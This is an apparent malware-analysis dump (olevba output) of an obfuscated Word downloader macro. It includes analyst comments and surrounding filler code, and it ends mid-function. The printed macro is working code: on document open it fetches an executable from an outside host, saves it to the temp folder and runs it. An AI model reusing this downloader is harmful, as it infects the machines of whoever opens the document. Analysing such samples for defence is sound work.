dynamoo

Malicious Word macro

Jul 22nd, 2015
  1. olevba 0.31 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. XML:MASI-B-V paymentreceipt.xml
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: paymentreceipt.xml
  10. Type: Word2003_XML
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: editdata.mso - OLE stream: u'VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub autoopen()
      ' Auto-exec entry point: the olevba summary in this report lists AutoOpen as
      ' running when the Word document is opened. The only statement is the call
      ' to VEeve; the 8.2 argument is never read there and looks like filler.
  17.  
  18. VEeve (8.2)
  19.  
  20. End Sub
  21.  
  22. Sub VEeve(FFFFF As Long)
      ' Indirection hop between autoopen and the downloader. FFFFF is not used.
      ' The callee is the Sub Recall_File_Location (with underscores) in Module1,
      ' not the similarly named file-dialog Function RecallFileLocation.
  23. Recall_File_Location
  24.  
  25. End Sub
  26.  
  27.  
  28.  
  29. -------------------------------------------------------------------------------
  30. VBA MACRO Module1.bas
  31. in file: editdata.mso - OLE stream: u'VBA/Module1'
  32. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  33. Public strSQLChart389 As String
      ' Despite the SQL-sounding name this holds the drop path: Recall_File_Location
      ' assigns TEMP & "\mikapolne.exe" to it and btn_hourly_sum_48_Click (Module2)
      ' reads it. Public scope is what lets the value cross the two modules.
  34. Public strTargettable As String
      ' Read only by GetOpenFile, which nothing in this listing calls; never assigned here.
  35.  
  36. '------ BEGIN IMPORT CODES -----------
  37.  
  38. 'This code was originally written by Ken Getz.
  39. 'It is not to be altered or distributed,
  40. 'except as part of an application.
  41. 'You are free to use it in any application,
  42. 'provided the copyright notice is left unchanged.
  43. '
  44. ' Code courtesy of:
  45. '   Microsoft Access 95 How-To
  46. ' Ken Getz and Paul Litwin
  47. ' Waite Group Press, 1996
  48.  
  49. Type tagOPENFILENAME
      ' Part of the borrowed file-dialog code credited in the header comment above.
      ' Field names follow the Win32 OPENFILENAME structure; the only user in this
      ' listing is ahtCommonFileOpenSave (Dim OFN As tagOPENFILENAME).
  50.     lStructSize As Long
  51.     hwndOwner As Long
  52.     hInstance As Long
  53.     strFilter As String
  54.     strCustomFilter As String
  55.     nMaxCustFilter As Long
  56.     nFilterIndex As Long
  57.     strFile As String
  58.     nMaxFile As Long
  59.     strFileTitle As String
  60.     nMaxFileTitle As Long
  61.     strInitialDir As String
  62.     strTitle As String
  63.     Flags As Long
  64.     nFileOffset As Integer
  65.     nFileExtension As Integer
  66.     strDefExt As String
  67.     lCustData As Long
  68.     lpfnHook As Long
  69.     lpTemplateName As String
  70. End Type
  71.  
  72.  
  73. Global Const ahtOFN_READONLY = &H1
      ' ahtOFN_* (this constant through ahtOFN_LONGNAMES): bit flags meant to be
      ' OR'd into the Flags argument of ahtCommonFileOpenSave. Only
      ' ahtOFN_FILEMUSTEXIST, ahtOFN_HIDEREADONLY and ahtOFN_NOCHANGEDIR are
      ' referenced in this listing (in GetOpenFile); none is on the autoopen path.
  74. Global Const ahtOFN_OVERWRITEPROMPT = &H2
  75. Global Const ahtOFN_HIDEREADONLY = &H4
  76. Global Const ahtOFN_NOCHANGEDIR = &H8
  77. Global Const ahtOFN_SHOWHELP = &H10
  78. ' You won't use these.
  79. 'Global Const ahtOFN_ENABLEHOOK = &H20
  80. 'Global Const ahtOFN_ENABLETEMPLATE = &H40
  81. 'Global Const ahtOFN_ENABLETEMPLATEHANDLE = &H80
  82. Global Const ahtOFN_NOVALIDATE = &H100
  83. Global Const ahtOFN_ALLOWMULTISELECT = &H200
  84. Global Const ahtOFN_EXTENSIONDIFFERENT = &H400
  85. Global Const ahtOFN_PATHMUSTEXIST = &H800
  86. Global Const ahtOFN_FILEMUSTEXIST = &H1000
  87. Global Const ahtOFN_CREATEPROMPT = &H2000
  88. Global Const ahtOFN_SHAREAWARE = &H4000
  89. Global Const ahtOFN_NOREADONLYRETURN = &H8000
  90. Global Const ahtOFN_NOTESTFILECREATE = &H10000
  91. Global Const ahtOFN_NONETWORKBUTTON = &H20000
  92. Global Const ahtOFN_NOLONGNAMES = &H40000
  93. ' New for Windows 95
  94. Global Const ahtOFN_EXPLORER = &H80000
  95. Global Const ahtOFN_NODEREFERENCELINKS = &H100000
  96. Global Const ahtOFN_LONGNAMES = &H200000
  97.  
  98.  
  99. Function GetOpenFile(Optional varDirectory As Variant, _
  100.     Optional varTitleForDialog As Variant) As Variant
       ' Borrowed file-picker helper: builds an "Excel (*.xls)" filter, asks
       ' ahtCommonFileOpenSave for a file name and passes the result to
       ' DoCmd.TransferSpreadsheet. Nothing in this listing calls it, so it is not
       ' part of the autoopen chain. NOTE(review): DoCmd is an Access object, so
       ' this presumably came from an Access project rather than a Word one.
  101. ' Here's an example that gets an Access database name.
  102. Dim strFilter As String
  103. Dim lngFlags As Long
  104. Dim varFileName As Variant
  105. ' Specify that the chosen file must already exist,
  106. ' don't change directories when you're done
  107. ' Also, don't bother displaying
  108. ' the read-only box. It'll only confuse people.
  109.    lngFlags = ahtOFN_FILEMUSTEXIST Or _
  110.                 ahtOFN_HIDEREADONLY Or ahtOFN_NOCHANGEDIR
  111.     If IsMissing(varDirectory) Then
  112.         varDirectory = ""
  113.     End If
  114.     If IsMissing(varTitleForDialog) Then
  115.         varTitleForDialog = "Hello World"
  116.     End If
  117.  
  118.     ' Define the filter string and allocate space in the "c"
  119.    ' string Duplicate this line with changes as necessary for
  120.    ' more file templates.
  121.    strFilter = ahtAddFilterItem(strFilter, _
  122.                 "Excel (*.xls)", "*.XLS")
  123.     ' Now actually call to get the file name.
  124.    varFileName = ahtCommonFileOpenSave( _
  125.                     OpenFile:=False, _
  126.                     InitialDir:=varDirectory, _
  127.                     Filter:=strFilter, _
  128.                     Flags:=lngFlags, _
  129.                     DialogTitle:=varTitleForDialog)
  130.    
  131.     If IsNull(varFileName) Then
  132.         MsgBox "Please choose a file to import", vbOKOnly, "Notification"
  133.     End If
  134.    
  135.     MsgBox varFileName
  136.     If Not IsNull(varFileName) Then
  137.         varFileName = TrimNull(varFileName)
  138.         GetOpenFile = varFileName
  139.         'DoCmd.TransferText acImportDelim, "csv_import_specs", "sales", GetOpenFile, True
  140.        DoCmd.TransferSpreadsheet acImport, acSpreadsheetTypeExcel9, strTargettable, GetOpenFile, True
  141.     Else
  142.         MsgBox "Please choose a file to import", vbOKOnly, "Notification"
  143.     End If
  144.  
  145. End Function
  146. Function RecallFileLocation() As String
       ' File-dialog helper that is NOT the routine autoopen reaches: VEeve calls the
       ' Sub Recall_File_Location (with underscores) defined right after this
       ' Function. The near-identical names make the two easy to confuse when
       ' reading the dump. Nothing in this listing calls this Function.
  147.     Dim strFilter As String, strLoc As String
  148.     Dim lngFlags As Long, MyDefault As String
  149.     strFilter = ahtAddFilterItem(strFilter, "Access Files (*.mda, *.mdb)", _
  150.                     "*.MDA;*.MDB")
  151.     'strFilter = ahtAddFilterItem(strFilter, "dBASE Files (*.dbf)", "*.DBF")
  152.    strFilter = ahtAddFilterItem(strFilter, "Text Files (*.txt)", "*.TXT")
  153.     strFilter = ahtAddFilterItem(strFilter, "Excel Files (*.xls)", "*.XLS")
  154.     strFilter = ahtAddFilterItem(strFilter, "All Files (*.*)", "*.*")
  155.  
  156.     MyDefault = "C:\"
  157.     ' MsgBox ValidateLocations(MyDefault)   Returns results of test to see if exists
  158.      
       ' lngFlags is passed without ever being assigned, so it goes in as 0.
  159.     RecallFileLocation = ahtCommonFileOpenSave(InitialDir:=MyDefault, _
  160.         Filter:=strFilter, FilterIndex:=3, Flags:=lngFlags, _
  161.         DialogTitle:="Find File to Open!")
  162.    
  163.     '    MsgBox "You selected: " & ahtCommonFileOpenSave(InitialDir:="S:\Assignment List\", _
  164.     '    Filter:=strFilter, FilterIndex:=3, Flags:=lngFlags, _
  165.     '    DialogTitle:="Find File to Open!")
  166.    ' Since you passed in a variable for lngFlags,
  167.    ' the function places the output flags value in the variable.
  168.    Debug.Print Hex(lngFlags)
  169. End Function
  170.  
  171. Sub Recall_File_Location()
       ' Download-and-run routine reached via autoopen -> VEeve. Every ProgID,
       ' method name and path is assembled from Chr() codes and short literals
       ' salted with "<", "=" and ";" (Chr 60/61/59), which are stripped at run time.
       ' Decoded flow, as read from the statements below:
       '   1. Microsoft.XMLHTTP: Open "GET", <url>, False, then Send
       '   2. WScript.Shell: Environment("Process")("TEMP") gives the temp directory
       '   3. responseBody is written to <TEMP>\mikapolne.exe (btn_this_month1_Click)
       '   4. a forced divide-by-zero jumps to the error handler, which calls
       '      btn_hourly_sum_48_Click to open the file just written
       ' Analyst notes: the only IOC row in the olevba summary table of this report
       ' is mikapolne.exe; the URL and ProgIDs are absent, presumably because the
       ' junk characters break literal matching. Host telemetry worth correlating:
       ' the Word process issuing an HTTP GET and an .exe appearing under %TEMP%.
  172.  
       ' Salted URL. After the three Replace calls below it reads
       ' hxxp://puerta[.]fr/sandra/write[.]exe (defanged in this note).
  173. cTdsOvmpZ0T = Chr(104) & "t" & ";" & Chr(116) & "p" & Chr(58) & Chr(61) & "/" & Chr(60) & "/" & Chr(112) & Chr(117) & "e" & "r" & "t" & Chr(97) & Chr(46) & "f" & Chr(60) & "r" & Chr(47) & Chr(115) & Chr(97) & "n" & Chr(100) & Chr(61) & Chr(114) & "a" & Chr(47) & Chr(119) & Chr(114) & "i" & Chr(116) & "e" & Chr(46) & "e" & Chr(59) & "x" & Chr(101)
       ' Argument decodes to "Microsoft.XMLHTTP"; the helper strips the junk
       ' characters and calls CreateObject on the result.
  174. Set ElDbasip6 = btn_hourly_transactions_99_Click("M" & Chr(105) & "c" & Chr(114) & Chr(111) & "<s" & "o" & Chr(102) & "t" & Chr(46) & Chr(88) & Chr(77) & Chr(60) & Chr(76) & Chr(72) & "T" & "<T;" & Chr(80))
  175.  cTdsOvmpZ0T = Replace(cTdsOvmpZ0T, Chr(60), "")
  176.  cTdsOvmpZ0T = Replace(cTdsOvmpZ0T, Chr(61), "")
  177.  cTdsOvmpZ0T = Replace(cTdsOvmpZ0T, Chr(59), "")
       ' CallByName hides the method name: this is .Open "GET", <url>, False
       ' (the trailing False requests a synchronous call).
  178. CallByName ElDbasip6, Chr(79) & Chr(112) & Chr(101) & Chr(110), VbMethod, "G" & "E" & Chr(84), _
  179. cTdsOvmpZ0T _
  180. , False
  181.  
       ' Argument decodes to "WScript.Shell".
  182. Set HURaWTTfnV70aA = btn_hourly_transactions_99_Click(Chr(87) & Chr(83) & Chr(99) & "<" & Chr(114) & Chr(105) & Chr(112) & "t;" & Chr(46) & Chr(83) & Chr(104) & Chr(101) & "l" & Chr(61) & Chr(108))
  183.  
       ' Property get: .Environment("Process") on the shell object.
  184. Set jfhAqR8f0z = CallByName(HURaWTTfnV70aA, Chr(69) & "n" & "v" & "i" & Chr(114) & Chr(111) & Chr(110) & Chr(109) & Chr(101) & Chr(110) & Chr(116), VbGet, Chr(80) & Chr(114) & Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115))
  185.  
       ' Looks up "TEMP" in that environment collection.
  186. Ga9exV0usiOxh = jfhAqR8f0z("T" & Chr(69) & Chr(77) & Chr(80))
  187.  
       ' Drop path: <TEMP> & "\mikapolne.exe", stored in the Public variable
       ' declared at the top of Module1 so that Module2 can read it later.
  188. strSQLChart389 = Ga9exV0usiOxh & Chr(92) & Chr(109) & Chr(105) & Chr(107) & "a" & Chr(112) & Chr(111) & Chr(108) & Chr(110) & Chr(101) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
  189. Dim FiiLlqz7ZuFikb() As Byte
  190.  
       ' "Send" issues the request; "responseBody" is then read into the byte array.
  191. CallByName ElDbasip6, "S" & "e" & Chr(110) & Chr(100), VbMethod
  192. FiiLlqz7ZuFikb = CallByName(ElDbasip6, "r" & "e" & Chr(115) & Chr(112) & Chr(111) & "n" & "s" & Chr(101) & "B" & Chr(111) & Chr(100) & Chr(121), VbGet)
       ' Writes the downloaded bytes to the drop path.
  193. btn_this_month1_Click FiiLlqz7ZuFikb, strSQLChart389
  194. On Error GoTo ke7nvlgCXNTah
       ' Deliberate division by zero: it raises a run-time error so control moves
       ' to the ke7nvlgCXNTah handler, which keeps the launch call out of the
       ' straight-line body of the Sub.
  195.     a = 84 / 0
  196.   On Error GoTo 0
  197.  
  198. f8kh1r1ELTN:
  199.   Exit Sub
  200. ke7nvlgCXNTah:
       ' The string argument is never read by the callee; the callee opens the
       ' path held in strSQLChart389.
  201.   btn_hourly_sum_48_Click ("avNTTxhUC9eWb")
  202. Resume f8kh1r1ELTN
  203. End Sub
  204. Function ahtAddFilterItem(strFilter As String, _
  205.     strDescription As String, Optional varItem As Variant) As String
       ' Part of the borrowed file-dialog code. Returns strFilter with
       ' strDescription, a null character, varItem ("*.*" when omitted) and a final
       ' null character appended. Called only by GetOpenFile and RecallFileLocation,
       ' neither of which is on the autoopen path.
  206. ' Tack a new chunk onto the file filter.
  207. ' That is, take the old value, stick onto it the description,
  208. ' (like "Databases"), a null character, the skeleton
  209. ' (like "*.mdb;*.mda") and a final null character.
  210.  
  211.     If IsMissing(varItem) Then varItem = "*.*"
  212.     ahtAddFilterItem = strFilter & _
  213.                 strDescription & vbNullChar & _
  214.                 varItem & vbNullChar
  215. End Function
  216.  
  217. Public Function btn_this_month1_Click(strSQLRank17 As Variant, inq7dnGSyLG As String)
       ' File-write stage of the dropper, named to blend in with the chart-button
       ' handlers in Module2. strSQLRank17 is the byte array to write (the HTTP
       ' response body at the only call site); inq7dnGSyLG is the destination path.
       ' The salted string below decodes to "Adodb.Stream" once the helper has
       ' removed "<", "=" and ";".
  218. Dim strSQLRank13: Set strSQLRank13 = btn_hourly_transactions_99_Click(Chr(65) & "d<" & Chr(111) & ";d" & Chr(98) & "." & Chr(83) & "t" & Chr(114) & Chr(101) & Chr(97) & Chr(61) & "=" & Chr(109))
  219.  
  220. With strSQLRank13
       ' Type 1 is ADODB's binary stream type; the 2 passed to savetofile is the
       ' create-or-overwrite save option, so an existing file at the path is replaced.
  221.    .Type = 1
  222.     .Open
  223.     .write strSQLRank17
  224.     .savetofile inq7dnGSyLG, 2
  225. End With
  226. End Function
  227. Private Function TrimNull(ByVal strItem As String) As String
       ' Returns strItem cut at its first null character, or unchanged when it
       ' contains none. Used by GetOpenFile and ahtCommonFileOpenSave only.
  228. Dim intPos As Integer
  229.     intPos = InStr(strItem, vbNullChar)
  230.     If intPos > 0 Then
  231.         TrimNull = Left(strItem, intPos - 1)
  232.     Else
  233.         TrimNull = strItem
  234.     End If
  235. End Function
  236.  
  237. Function show_chart_controls(thisVisibility As Boolean)
       ' Sets .Visible on a list of form controls to thisVisibility. The cevMe
       ' qualifier is not defined anywhere in this listing, and the only callers
       ' (img_sales_trends_Click, Form_Load) are themselves off the autoopen path,
       ' so this reads as filler surrounding the download code.
  238.  
  239.   'sales trending controls
  240.  cevMe.a_this_week.Visible = thisVisibility
  241.   cevMe.a_this_month.Visible = thisVisibility
  242.   cevMe.a_this_quarter.Visible = thisVisibility
  243.   cevMe.btn_this_month.Visible = thisVisibility
  244.   cevMe.btn_this_quarter.Visible = thisVisibility
  245.   cevMe.btn_this_week.Visible = thisVisibility
  246.  
  247.   'hourly trending controls
  248.  cevMe.a_hourly_14.Visible = thisVisibility
  249.   cevMe.a_hourly_30.Visible = thisVisibility
  250.   cevMe.a_hourly_sum_14.Visible = thisVisibility
  251.   cevMe.a_hourly_sum_30.Visible = thisVisibility
  252.   cevMe.a_hourly_transactions_14.Visible = thisVisibility
  253.   cevMe.a_hourly_transactions_30.Visible = thisVisibility
  254.  
  255.   cevMe.btn_hourly_14.Visible = thisVisibility
  256.   cevMe.btn_hourly_30.Visible = thisVisibility
  257.   cevMe.btn_hourly_sum_14.Visible = thisVisibility
  258.   cevMe.btn_hourly_sum_30.Visible = thisVisibility
  259.   cevMe.btn_hourly_transactions_14.Visible = thisVisibility
  260.   cevMe.btn_hourly_transactions_30.Visible = thisVisibility
  261.  
  262.   'labels
  263.  cevMe.label_hourly.Visible = thisVisibility
  264.   cevMe.label_avg.Visible = thisVisibility
  265.   cevMe.label_sum.Visible = thisVisibility
  266.   cevMe.label_transactions.Visible = thisVisibility
  267.  
  268. End Function
  269. '-------------- END IMPORT CODES --------------
  270.  
  271. -------------------------------------------------------------------------------
  272. VBA MACRO Module2.bas
  273. in file: editdata.mso - OLE stream: u'VBA/Module2'
  274. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  275. Dim strNoOfDays As Integer ' module-level; set to 14 or 30 by the btn_hourly_* handlers in this module
  276.  
  277.  
  278.  
  279. Private Sub btn_this_month_Click()
       ' Filler: chart-button handler that builds a "TOP 30" sales query string.
       ' The fb and dd objects are not defined in this listing and nothing on the
       ' autoopen path calls this Sub.
  280.  
  281.   Call fb.EndTimer
  282.   Call dd.set_chart_labels("sales")
  283.  
  284.   chChartTitle = "30-Day Sales Trending"
  285.  
  286.   strSQLRank = "TOP 30"
  287.   strSQLChart = "SELECT " & strSQLRank & " DtlsDate, SUM(ExtPriceEff) AS totalSales FROM SalesDtls " & strSQLWhere & " GROUP BY DtlsDate ORDER BY DtlsDate DESC"
  288.  
  289.   Call dd.BuildSalesChart
  290.  
  291. End Sub
  292.  
  293. Private Sub btn_this_quarter_Click()
       ' Filler: same shape as btn_this_month_Click with "TOP 90". The object
       ' qualifiers (cc, ccc, lkd) differ from the sibling handlers and are not
       ' defined in this listing; not on the autoopen path.
  294.  
  295.   Call cc.EndTimer
  296.   Call ccc.set_chart_labels("sales")
  297.  
  298.   chChartTitle = "90-Day Sales Trending"
  299.  
  300.   strSQLRank = "TOP 90"
  301.   strSQLChart = "SELECT " & strSQLRank & " DtlsDate, SUM(ExtPriceEff) AS totalSales FROM SalesDtls " & strSQLWhere & " GROUP BY DtlsDate ORDER BY DtlsDate DESC"
  302.  
  303.   Call lkd.BuildSalesChart
  304.  
  305. End Sub
  306.  
  307. Private Sub btn_this_week_Click()
       ' Filler: "TOP 14" variant of the sales-trend handlers. kl, oo and ce are
       ' not defined in this listing; not on the autoopen path.
  308.  
  309.   Call kl.EndTimer
  310.   Call oo.set_chart_labels("sales")
  311.  
  312.   chChartTitle = "14-Day Sales Trending"
  313.  
  314.   strSQLRank = "TOP 14"
  315.   strSQLChart = "SELECT " & strSQLRank & " DtlsDate, SUM(ExtPriceEff) AS totalSales FROM SalesDtls " & strSQLWhere & " GROUP BY DtlsDate ORDER BY DtlsDate DESC"
  316.  
  317.   Call ce.BuildSalesChart
  318.  
  319. End Sub
  320.  
  321. Public Function btn_hourly_sum_48_Click(oTOZyLSZ9iofhw As String)
       ' Launch stage, named like the neighbouring btn_hourly_sum_14/30 handlers but
       ' Public and called from Recall_File_Location's error handler in Module1.
       ' The parameter is never read. The salted string decodes to
       ' "Shell.Application"; its Open method is given strSQLChart389, the Public
       ' variable holding <TEMP>\mikapolne.exe, i.e. the file just written to disk.
  322.  Set strSQLChart1 = btn_hourly_transactions_99_Click("S" & "h" & Chr(59) & "e" & "<l" & "l" & Chr(46) & Chr(65) & Chr(112) & "p" & Chr(108) & "i" & Chr(99) & Chr(97) & Chr(116) & "i=" & "o" & Chr(110))
  323. strSQLChart1.Open (strSQLChart389)
  324. End Function
  325.  
  326.  
  327.  
  328. Private Sub img_sales_trends_Click()
       ' Filler: builds the "TOP 14" sales query and calls show_chart_controls(True).
       ' dss, ccc and ll are not defined in this listing; not on the autoopen path.
  329.  
  330.   Call dss.EndTimer
  331.   Call ccc.set_chart_labels("sales")
  332.   'Call Subforms_reset
  333.  
  334.   chChartTitle = "14-Day Sales Trending"
  335.  
  336.   strSQLRank = "TOP 14"
  337.   strSQLChart = "SELECT " & strSQLRank & " DtlsDate, SUM(ExtPriceEff) AS totalSales FROM SalesDtls " & strSQLWhere & " GROUP BY DtlsDate ORDER BY DtlsDate DESC"
  338.  
  339.   Call ll.BuildSalesChart
  340.  
  341.   Call show_chart_controls(True)
  342.  
  343. End Sub
  344.  
  345. Private Sub btn_hourly_14_Click()
       ' Filler: sets strNoOfDays to 14 and builds an average-sales-per-hour query
       ' string. vr, fe and ec are not defined in this listing; not on the
       ' autoopen path.
  346.  
  347.   Call vr.EndTimer
  348.   Call fe.set_chart_labels("hourly")
  349.  
  350.   strNoOfDays = 14
  351.   chChartTitle = "Ave. Sales per Hour Over Past " & strNoOfDays & " Days"
  352.  
  353.   strSQLChart = "SELECT FORMAT(hour) AS hour_of_day, FORMAT(Avg(hourly_sales),'Standard') AS avg_hourly_sales FROM hourly_data_query WHERE DtlsDate BETWEEN NOW() AND NOW()-" & strNoOfDays & " GROUP BY hour" 'DateValue('6/1/2011') AND DateValue('6/30/2011') GROUP BY hour"
  354.  
  355.   Call ec.BuildSalesChart
  356.  
  357. End Sub
  358.  
  359.  
  360. Private Sub btn_hourly_30_Click()
       ' Filler: 30-day variant of btn_hourly_14_Click. Note the method name
       ' sset_chart_labels (sic) on the second call; mm, ef and ls are not defined
       ' in this listing; not on the autoopen path.
  361.  
  362.   Call mm.EndTimer
  363.   Call ef.sset_chart_labels("hourly")
  364.  
  365.   strNoOfDays = 30
  366.   chChartTitle = "Ave. Sales per Hour Over Past " & strNoOfDays & " Days"
  367.    
  368.   strSQLChart = "SELECT FORMAT(hour) AS hour_of_day, FORMAT(Avg(hourly_sales),'Standard') AS avg_hourly_sales FROM hourly_data_query WHERE DtlsDate BETWEEN NOW() AND NOW()-" & strNoOfDays & " GROUP BY hour" 'DateValue('6/1/2011') AND DateValue('6/30/2011') GROUP BY hour"
  369.  
  370.   Call ls.BuildSalesChart
  371.  
  372. End Sub
  373.  
  374. Private Sub btn_hourly_sum_14_Click()
       ' Filler: 14-day aggregate-sales-per-hour query builder. dcd, aa and lfk are
       ' not defined in this listing; not on the autoopen path. The launch routine
       ' btn_hourly_sum_48_Click borrows this naming pattern.
  375.  
  376.   Call dcd.EndTimer
  377.   Call aa.set_chart_labels("hourly")
  378.  
  379.   strNoOfDays = 14
  380.   chChartTitle = "Aggregate Sales per Hour Over Past " & strNoOfDays & " Days"
  381.    
  382.   strSQLChart = "SELECT hour, sum(hourly_sales) as sum_hourly_sales FROM hourly_data_query WHERE DtlsDate BETWEEN NOW() AND NOW()-" & strNoOfDays & " GROUP BY hour"
  383.  
  384.   Call lfk.BuildSalesChart
  385.  
  386. End Sub
  387. Private Sub btn_hourly_sum_30_Click()
       ' Filler: 30-day variant of btn_hourly_sum_14_Click. la, ds and ll are not
       ' defined in this listing; not on the autoopen path.
  388.  
  389.   Call la.EndTimer
  390.   Call ds.set_chart_labels("hourly")
  391.  
  392.   strNoOfDays = 30
  393.   chChartTitle = "Aggregate Sales per Hour Over Past " & strNoOfDays & " Days"
  394.    
  395.   strSQLChart = "SELECT hour, sum(hourly_sales) as sum_hourly_sales FROM hourly_data_query WHERE DtlsDate BETWEEN NOW() AND NOW()-" & strNoOfDays & " GROUP BY hour"
  396.  
  397.   Call ll.BuildSalesChart
  398.  
  399. End Sub
  400.  
  401. Public Function btn_hourly_transactions_99_Click(Fpsh8W7KwFw4n3 As String)
       ' De-salting object factory used by every stage of the download chain: it
       ' removes "<" (Chr 60), "=" (Chr 61) and ";" (Chr 59) from the argument and
       ' returns CreateObject on what is left. In this listing the callers pass
       ' strings that decode to Microsoft.XMLHTTP, WScript.Shell, Adodb.Stream and
       ' Shell.Application. Because every CreateObject goes through this one
       ' function, it is the natural place to log or breakpoint when tracing the macro.
  402. Fpsh8W7KwFw4n3 = Replace(Fpsh8W7KwFw4n3, Chr(60), "")
  403.  Fpsh8W7KwFw4n3 = Replace(Fpsh8W7KwFw4n3, Chr(61), "")
  404.  Fpsh8W7KwFw4n3 = Replace(Fpsh8W7KwFw4n3, Chr(59), "")
  405.  Set btn_hourly_transactions_99_Click = CreateObject(Fpsh8W7KwFw4n3)
  406. End Function
  407. Private Sub btn_hourly_transactions_14_Click()
       ' Filler: 14-day items-sold-per-hour query builder. oo, oa and dw are not
       ' defined in this listing; not on the autoopen path. The object factory
       ' btn_hourly_transactions_99_Click borrows this naming pattern.
  408.  
  409.   Call oo.EndTimer
  410.   Call oa.set_chart_labels("item_count")
  411.  
  412.   strNoOfDays = 14
  413.   chChartTitle = "Aggregate Items Sold per Hour Over Past " & strNoOfDays & " Days"
  414.    
  415.   strSQLChart = "SELECT TIMESERIAL(FORMAT(SalesDtls.EndTime,'HH'),0,0) AS [hour], COUNT(ExtPriceEff) AS trans_count FROM SalesDtls WHERE DtlsDate BETWEEN NOW() AND NOW()-" & strNoOfDays & " AND Status = 'REG' GROUP BY TIMESERIAL(FORMAT(SalesDtls.EndTime,'HH'),0,0)"
  416.  
  417.   Call dw.BuildSalesChart
  418.  
  419. End Sub
  420.  
  421. Private Sub btn_hourly_transactions_30_Click()
       ' Filler: 30-day variant of btn_hourly_transactions_14_Click. dwd, aa and
       ' lla are not defined in this listing; not on the autoopen path.
  422.  
  423.   Call dwd.EndTimer
  424.   Call aa.set_chart_labels("hourly")
  425.  
  426.   strNoOfDays = 30
  427.   chChartTitle = "Aggregate Items Sold per Hour Over Past " & strNoOfDays & " Days"
  428.    
  429.   strSQLChart = "SELECT TIMESERIAL(FORMAT(SalesDtls.EndTime,'HH'),0,0) AS [hour], COUNT(ExtPriceEff) AS trans_count FROM SalesDtls WHERE DtlsDate BETWEEN NOW() AND NOW()-" & strNoOfDays & " AND Status = 'REG' GROUP BY TIMESERIAL(FORMAT(SalesDtls.EndTime,'HH'),0,0)"
  430.  
  431.   Call lla.BuildSalesChart
  432.  
  433. End Sub
  434.  
  435. Private Sub Form_Load()
       ' Filler: hides the chart controls, calls cs.reset_sales_subforms and sets
       ' strSQLWhere. cs is not defined in this listing and nothing on the autoopen
       ' path calls this Sub.
  436.    
  437.   'hide links
  438.  Call show_chart_controls(False)
  439.    
  440.   'reset subform objects
  441.  Call cs.reset_sales_subforms
  442.  
  443.   strSQLWhere = "WHERE Status = 'REG'"
  444.  
  445. End Sub
  446.  
  447. Private Sub img_sales_monitor_Click()
       ' Filler: subform formatting calls on sc and cc, neither of which is defined
       ' in this listing; not on the autoopen path.
  448.    
  449.   Call sc.reset_sales_subforms
  450.  
  451.   objSubformControl = "viewer"
  452.   Call sc.format_viewer("sales_viewer", 1, 1)
  453.  
  454.   objSubformControl = "info"
  455.   Call sc.format_viewer("sales_summary", 1, 1)
  456.    
  457.   cc.Me.focustaker.SetFocus
  458.  
  459. End Sub
  460.  
  461.  
  462. Function ahtCommonFileOpenSave( _
  463.             Optional ByRef Flags As Variant, _
  464.             Optional ByVal InitialDir As Variant, _
  465.             Optional ByVal Filter As Variant, _
  466.             Optional ByVal FilterIndex As Variant, _
  467.             Optional ByVal DefaultExt As Variant, _
  468.             Optional ByVal FileName As Variant, _
  469.             Optional ByVal DialogTitle As Variant, _
  470.             Optional ByVal HWnd As Variant, _
  471.             Optional ByVal OpenFile As Variant) As Variant
       ' NOTE(review): as it appears in this dump the routine does not look
       ' runnable. OFN is filled in but is passed to neither
       ' vdvd.aht_apiGetOpenFileName() nor vdvd.aht_apiGetSaveFileName(), and vdvd
       ' and cs are not defined anywhere in the listing. Its only callers here are
       ' GetOpenFile and RecallFileLocation, neither of which is on the autoopen
       ' path, so the function reads as borrowed padding around the download code.
  472. ' This is the entry point you'll use to call the common
  473. ' file open/save dialog. The parameters are listed
  474. ' below, and all are optional.
  475. '
  476. ' In:
  477. ' Flags: one or more of the ahtOFN_* constants, OR'd together.
  478. ' InitialDir: the directory in which to first look
  479. ' Filter: a set of file filters, set up by calling
  480. ' AddFilterItem. See examples.
  481. ' FilterIndex: 1-based integer indicating which filter
  482. ' set to use, by default (1 if unspecified)
  483. ' DefaultExt: Extension to use if the user doesn't enter one.
  484. ' Only useful on file saves.
  485. ' FileName: Default value for the file name text box.
  486. ' DialogTitle: Title for the dialog.
  487. ' hWnd: parent window handle
  488. ' OpenFile: Boolean(True=Open File/False=Save As)
  489. ' Out:
  490. ' Return Value: Either Null or the selected filename
  491. Dim OFN As tagOPENFILENAME
  492. Dim strFileName As String
  493. Dim strFileTitle As String
  494. Dim fResult As Boolean
  495.     ' Give the dialog a caption title.
  496.    If IsMissing(InitialDir) Then InitialDir = CurDir
  497.     If IsMissing(Filter) Then Filter = ""
  498.     If IsMissing(FilterIndex) Then FilterIndex = 1
  499.     If IsMissing(Flags) Then Flags = 0&
  500.     If IsMissing(DefaultExt) Then DefaultExt = ""
  501.     If IsMissing(FileName) Then FileName = ""
  502.     If IsMissing(DialogTitle) Then DialogTitle = ""
  503.     If IsMissing(HWnd) Then HWnd = cs.Application.hWndAccessApp
  504.     If IsMissing(OpenFile) Then OpenFile = True
  505.     ' Allocate string space for the returned strings.
  506.    strFileName = Left(FileName & String(256, 0), 256)
  507.     strFileTitle = String(256, 0)
  508.     ' Set up the data structure before you call the function
  509.    With OFN
  510.         .lStructSize = Len(OFN)
  511.         .hwndOwner = HWnd
  512.         .strFilter = Filter
  513.         .nFilterIndex = FilterIndex
  514.         .strFile = strFileName
  515.         .nMaxFile = Len(strFileName)
  516.         .strFileTitle = strFileTitle
  517.         .nMaxFileTitle = Len(strFileTitle)
  518.         .strTitle = DialogTitle
  519.         .Flags = Flags
  520.         .strDefExt = DefaultExt
  521.         .strInitialDir = InitialDir
  522.         ' Didn't think most people would want to deal with
  523.        ' these options.
